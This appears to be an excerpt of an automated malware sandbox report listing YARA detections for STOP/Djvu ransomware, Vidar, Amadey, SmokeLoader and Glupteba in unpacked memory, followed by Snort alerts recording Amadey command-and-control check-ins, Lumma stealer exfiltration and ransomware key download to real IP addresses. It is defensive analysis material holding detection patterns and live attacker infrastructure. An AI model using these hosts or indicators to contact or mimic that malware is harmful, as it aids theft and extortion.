8.2.958B.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
44.2.build2.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
23.2.yiueea.exe.190000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
23.2.yiueea.exe.190000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x7800:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
42.2.build2.exe.3df15a0.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
14.2.958B.exe.23a15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
14.2.958B.exe.23a15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
14.2.958B.exe.23a15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
38.2.F3CC.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
14.2.958B.exe.23a15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
14.2.958B.exe.23a15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
14.2.958B.exe.23a15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
38.2.F3CC.exe.730e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
24.2.958B.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
24.2.958B.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
24.2.958B.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
42.2.build2.exe.3df15a0.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
23.0.yiueea.exe.190000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
23.0.yiueea.exe.190000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x7800:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
0.2.file.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
35.0.yiueea.exe.190000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
35.0.yiueea.exe.190000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x7800:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
36.2.958B.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
36.2.958B.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
36.2.958B.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
5.2.vusretg.760e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
20.2.958B.exe.23d15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
20.2.958B.exe.23d15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
20.2.958B.exe.23d15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0.3.file.exe.850000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
37.2.958B.exe.23a15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
37.2.958B.exe.23a15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
37.2.958B.exe.23a15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
22.2.C5F5.exe.a20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.2.C5F5.exe.a20000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x7800:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
39.2.958B.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
39.2.958B.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
39.2.958B.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
7.2.958B.exe.23f15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
7.2.958B.exe.23f15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
7.2.958B.exe.23f15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
24.2.958B.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
24.2.958B.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
24.2.958B.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
40.3.2899.exe.5a80000.3.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
40.2.2899.exe.5190e67.13.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
40.2.2899.exe.400000.2.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
Click to see the 77 entries

Snort Signatures

ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.5 - Destination IP: 104.21.34.166

Timestamp:	192.168.2.5104.21.34.16649966802048094 10/13/23-15:22:56.421707
SID:	2048094
Source Port:	49966
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849833802027700 10/13/23-15:22:05.141523
SID:	2027700
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849876802027700 10/13/23-15:22:20.097399
SID:	2027700
Source Port:	49876
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849974802027700 10/13/23-15:22:59.669624
SID:	2027700
Source Port:	49974
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849989802027700 10/13/23-15:23:10.080571
SID:	2027700
Source Port:	49989
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849781802027700 10/13/23-15:21:37.316404
SID:	2027700
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849928802027700 10/13/23-15:22:38.748201
SID:	2027700
Source Port:	49928
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850002802027700 10/13/23-15:23:19.945356
SID:	2027700
Source Port:	50002
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850030802027700 10/13/23-15:23:40.731674
SID:	2027700
Source Port:	50030
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850020802027700 10/13/23-15:23:32.989492
SID:	2027700
Source Port:	50020
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849768802027700 10/13/23-15:21:25.642996
SID:	2027700
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849866802027700 10/13/23-15:22:15.139270
SID:	2027700
Source Port:	49866
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850017802027700 10/13/23-15:23:31.190076
SID:	2027700
Source Port:	50017
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849771802027700 10/13/23-15:21:28.483797
SID:	2027700
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849999802027700 10/13/23-15:23:18.071741
SID:	2027700
Source Port:	49999
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey Bot Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849765802044623 10/13/23-15:21:23.868578
SID:	2044623
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849805802027700 10/13/23-15:21:51.890845
SID:	2027700
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Filecoder.STOP Variant Public Key Download - Source IP: 14.33.209.147 - Destination IP: 192.168.2.5

Timestamp:	14.33.209.147192.168.2.580497342036335 10/13/23-15:21:09.518902
SID:	2036335
Source Port:	80
Destination Port:	49734
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849984802027700 10/13/23-15:23:06.466457
SID:	2027700
Source Port:	49984
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850009802027700 10/13/23-15:23:25.466259
SID:	2027700
Source Port:	50009
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849788802027700 10/13/23-15:21:41.676174
SID:	2027700
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849800802027700 10/13/23-15:21:49.276813
SID:	2027700
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850010802027700 10/13/23-15:23:26.406474
SID:	2027700
Source Port:	50010
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850027802027700 10/13/23-15:23:39.812139
SID:	2027700
Source Port:	50027
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850040802027700 10/13/23-15:23:48.027782
SID:	2027700
Source Port:	50040
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850045802027700 10/13/23-15:23:51.738181
SID:	2027700
Source Port:	50045
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850063802027700 10/13/23-15:24:04.755356
SID:	2027700
Source Port:	50063
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850025802027700 10/13/23-15:23:38.010785
SID:	2027700
Source Port:	50025
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849841802027700 10/13/23-15:22:07.796114
SID:	2027700
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849868802027700 10/13/23-15:22:16.312514
SID:	2027700
Source Port:	49868
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850019802027700 10/13/23-15:23:32.109182
SID:	2027700
Source Port:	50019
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.5 - Destination IP: 172.67.144.245

Timestamp:	192.168.2.5172.67.144.24549825802048094 10/13/23-15:22:03.609185
SID:	2048094
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849896802027700 10/13/23-15:22:28.282661
SID:	2027700
Source Port:	49896
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849798802027700 10/13/23-15:21:48.432808
SID:	2027700
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850055802027700 10/13/23-15:23:59.380970
SID:	2027700
Source Port:	50055
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey Bot Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849760802044623 10/13/23-15:21:22.457553
SID:	2044623
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849987802027700 10/13/23-15:23:08.261340
SID:	2027700
Source Port:	49987
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850050802027700 10/13/23-15:23:55.610977
SID:	2027700
Source Port:	50050
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849783802027700 10/13/23-15:21:39.058351
SID:	2027700
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849982802027700 10/13/23-15:23:04.312997
SID:	2027700
Source Port:	49982
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850058802027700 10/13/23-15:24:01.165708
SID:	2027700
Source Port:	50058
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849908802027700 10/13/23-15:22:33.383063
SID:	2027700
Source Port:	49908
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849863802027700 10/13/23-15:22:14.259828
SID:	2027700
Source Port:	49863
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850053802027700 10/13/23-15:23:58.476211
SID:	2027700
Source Port:	50053
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850061802027700 10/13/23-15:24:03.866672
SID:	2027700
Source Port:	50061
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849803802027700 10/13/23-15:21:50.994711
SID:	2027700
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849874802027700 10/13/23-15:22:19.198721
SID:	2027700
Source Port:	49874
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849791802027700 10/13/23-15:21:43.374724
SID:	2027700
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849879802027700 10/13/23-15:22:21.876808
SID:	2027700
Source Port:	49879
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

